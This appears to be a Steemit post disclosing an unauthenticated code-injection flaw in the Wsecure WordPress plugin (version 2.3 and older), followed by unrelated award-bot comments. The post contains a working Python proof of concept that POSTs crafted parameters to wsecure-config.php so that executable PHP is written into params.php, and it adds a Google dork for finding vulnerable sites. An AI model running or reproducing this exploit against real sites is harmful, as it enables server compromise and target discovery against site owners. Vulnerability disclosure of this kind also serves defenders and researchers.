This vulnerability allows attackers to access the servers of all sites using version 2.3 of Wsecure or older with disabled "Magic Quotes" and don't require plugin be active. Plugin have more than 12000 downloads and 2000 activate installs.
Vulnerable file is wsecure-config.php. It gets your POST and allows write Executable code to params.php.
PoS on Python:
import requests
data = {'wsecure_action':'update','key':'','publish':'";\n public function __construct() { echo "Hello!"; }\n/','options':'','custom_path':'"/#"'}
site = "http://[wp-site]/wp-content/plugins/wsecure/wsecure-config.php"
res = requests.post(site, data=data)
print res.text
Version: 2.3 or older
Vendor Homepage: http://www.joomlaserviceprovider.com/
Google Dork: inurl: "/wp-content/plugins/wsecure/wsecure-config.php"
Congratulations @soft! You have received a personal award!
2 Years on Steemit
Click on the badge to view your Board of Honor.
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit
Congratulations @soft! You received a personal award!
You can view your badges on your Steem Board and compare to others on the Steem Ranking
Vote for @Steemitboard as a witness to get one more award and increased upvotes!
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit